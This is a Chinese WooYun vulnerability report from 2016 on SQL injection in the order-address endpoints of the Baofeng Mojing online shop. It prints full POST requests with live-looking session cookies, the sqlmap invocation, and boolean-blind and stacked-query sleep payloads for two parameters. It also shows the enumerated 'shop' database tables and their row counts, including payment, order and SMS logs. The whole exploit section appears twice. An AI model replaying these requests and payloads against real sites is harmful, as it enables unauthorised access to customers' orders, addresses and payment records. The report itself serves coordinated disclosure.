当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204847

漏洞标题:暴风魔镜多出SQL注入泄露大量订单信息会员信息

相关厂商:暴风魔镜

漏洞作者: 黑色键盘丶

提交时间:2016-05-04 11:55

修复时间:2016-06-18 12:00

公开时间:2016-06-18 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT 厂商大哥

详细说明:

两处post注入语法:sqlmap.py -r 1.txt --dbs
---------------------------post数据包-----------------------------  注入参数address_id 
POST /order/user/myaddressdelete HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 69
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
=====================================================================
Parameter: address_id (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
_page&dis_address_id=49152
---
另外一处
------------------------post数据包------------------------------------- 注入参数address_id_e
POST /order/user/myaddressedit HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 386
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
===============================================================
Parameter: address_id_e (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: address_link_province_id_e=110000&address_link_province_name_e=????
?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
P(5)))ArXO)#&address_link_code_e=111111
---


数据库信息

available databases [2]:
[*] information_schema
[*] shop


商品表信息

Database: shop
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| sms_send_log              | 1740521 |
| financial_alipay_log      | 260480  |
| order_history             | 144861  |
| goods_booking_info        | 83855   |
| order_goods               | 51689   |
| order_address             | 50871   |
| order_express             | 50871   |
| order_invoice             | 50871   |
| order_info                | 50773   |
| weidian_user              | 46435   |
| weidian_usersub           | 46381   |
| userid                    | 39879   |
| order_cart                | 36996   |
| data_sale                 | 36316   |
| order_paylog              | 36042   |
| weidian_usershare         | 29982   |
| pic_center_picture        | 19622   |
| order_ready               | 11500   |
| edb_order                 | 6022    |
| activity_user_log         | 3816    |
| order_refund              | 3186    |
| basic_area                | 3152    |
| order_return              | 1833    |
| weidian_useraddress       | 642     |
| static_file               | 571     |
| goods_act_stats           | 365     |
| edb_order_refund          | 351     |
| basic_city                | 345     |
| user_info                 | 304     |
| order_barter_address      | 274     |
| goods_picture_mapping     | 263     |
| order_barter              | 255     |
| basic_freight             | 186     |
| goods_picture_mapping0115 | 174     |
| admin_menu                | 157     |
| goods_picture             | 108     |
| weidian_usersub_mirror    | 108     |
| order_action              | 67      |
| goods                     | 46      |
| admin_user                | 37      |
| basic_province            | 31      |
| goods_booking             | 29      |
| goods0115                 | 27      |
| basic_express             | 25      |
| activity_purchase         | 19      |
| goods_property            | 19      |
| goods_attr                | 17      |
| goods_property_h5         | 17      |
| admin_group               | 16      |
| goods_h5                  | 16      |
| order_activity            | 16      |
| goods_property0115        | 14      |
| cms_nav                   | 7       |
| basic_freight_plan        | 6       |
| goods_gift_activity       | 6       |
| mcode_log                 | 6       |
| cms_activity              | 5       |
| cms_evaluate              | 5       |
| cms_masscontent           | 4       |
| cms_masstype              | 4       |
| cms_hotsale               | 3       |
| cms_video                 | 3       |
| activity_order            | 2       |
| financial_account         | 2       |
| crontab_list              | 1       |
+---------------------------+---------+


信息就不跑咯

漏洞证明:

两处post注入语法:sqlmap.py -r 1.txt --dbs
---------------------------post数据包-----------------------------  注入参数address_id 
POST /order/user/myaddressdelete HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 69
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
=====================================================================
Parameter: address_id (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
_page&dis_address_id=49152
---
另外一处
------------------------post数据包------------------------------------- 注入参数address_id_e
POST /order/user/myaddressedit HTTP/1.1
Host: www.mojing.cn
Proxy-Connection: keep-alive
Content-Length: 386
Origin: http://www.mojing.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mojing.cn/order/user/myaddress
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
===============================================================
Parameter: address_id_e (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: address_link_province_id_e=110000&address_link_province_name_e=????
?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
P(5)))ArXO)#&address_link_code_e=111111
---


数据库信息

available databases [2]:
[*] information_schema
[*] shop


商品表信息

Database: shop
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| sms_send_log              | 1740521 |
| financial_alipay_log      | 260480  |
| order_history             | 144861  |
| goods_booking_info        | 83855   |
| order_goods               | 51689   |
| order_address             | 50871   |
| order_express             | 50871   |
| order_invoice             | 50871   |
| order_info                | 50773   |
| weidian_user              | 46435   |
| weidian_usersub           | 46381   |
| userid                    | 39879   |
| order_cart                | 36996   |
| data_sale                 | 36316   |
| order_paylog              | 36042   |
| weidian_usershare         | 29982   |
| pic_center_picture        | 19622   |
| order_ready               | 11500   |
| edb_order                 | 6022    |
| activity_user_log         | 3816    |
| order_refund              | 3186    |
| basic_area                | 3152    |
| order_return              | 1833    |
| weidian_useraddress       | 642     |
| static_file               | 571     |
| goods_act_stats           | 365     |
| edb_order_refund          | 351     |
| basic_city                | 345     |
| user_info                 | 304     |
| order_barter_address      | 274     |
| goods_picture_mapping     | 263     |
| order_barter              | 255     |
| basic_freight             | 186     |
| goods_picture_mapping0115 | 174     |
| admin_menu                | 157     |
| goods_picture             | 108     |
| weidian_usersub_mirror    | 108     |
| order_action              | 67      |
| goods                     | 46      |
| admin_user                | 37      |
| basic_province            | 31      |
| goods_booking             | 29      |
| goods0115                 | 27      |
| basic_express             | 25      |
| activity_purchase         | 19      |
| goods_property            | 19      |
| goods_attr                | 17      |
| goods_property_h5         | 17      |
| admin_group               | 16      |
| goods_h5                  | 16      |
| order_activity            | 16      |
| goods_property0115        | 14      |
| cms_nav                   | 7       |
| basic_freight_plan        | 6       |
| goods_gift_activity       | 6       |
| mcode_log                 | 6       |
| cms_activity              | 5       |
| cms_evaluate              | 5       |
| cms_masscontent           | 4       |
| cms_masstype              | 4       |
| cms_hotsale               | 3       |
| cms_video                 | 3       |
| activity_order            | 2       |
| financial_account         | 2       |
| crontab_list              | 1       |
+---------------------------+---------+


信息就不跑咯

修复方案:

过滤啦

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-04 11:58

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无